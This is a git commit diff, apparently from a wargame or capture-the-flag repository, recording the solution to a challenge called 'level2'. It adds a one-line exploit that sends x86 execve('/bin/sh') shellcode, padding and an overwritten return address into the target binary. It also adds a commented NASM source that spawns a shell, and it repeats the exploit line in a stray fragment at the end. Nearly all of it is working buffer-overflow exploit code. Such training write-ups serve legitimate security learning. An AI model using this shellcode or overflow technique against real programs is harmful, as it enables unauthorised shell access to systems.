level2 done

2025-04-28 17:09:58 +02:00
parent 9e787cb6b9
commit 291c839668
4 changed files with 43 additions and 2 deletions
--- a/level2/ressources/exploit
+++ b/level2/ressources/exploit
@ -0,0 +1 @@
+(python -c 'print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A" * 55 + "\x08\xa0\x04\x08"' ; cat) | ./level2
--- a/level2/ressources/linux_shell.s
+++ b/level2/ressources/linux_shell.s
@ -0,0 +1,25 @@
+; run /bin/sh and normal exit
+; author @cocomelonc
+; nasm -f elf32 -o example3.o example3.asm
+; ld -m elf_i386 -o example3 example3.o && ./example3
+; 32-bit linux
+
+section .bss
+
+section .text
+  global _start   ; must be declared for linker
+
+_start:           ; linker entry point
+
+  ; xoring anything with itself clears itself:
+  xor eax, eax    ; zero out eax
+  xor ebx, ebx    ; zero out ebx
+  xor ecx, ecx    ; zero out ecx
+  xor edx, edx    ; zero out edx
+
+  push eax        ; string terminator
+  push 0x68732f6e ; "hs/n"
+  push 0x69622f2f ; "ib//"
+  mov ebx, esp    ; "//bin/sh",0 pointer is ESP
+  mov al, 0xb     ; mov eax, 11: execve
+  int 0x80        ; syscall
				`@ -0,0 +1 @@`
				`(python -c 'print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A" * 55 + "\x08\xa0\x04\x08"' ; cat) \| ./level2`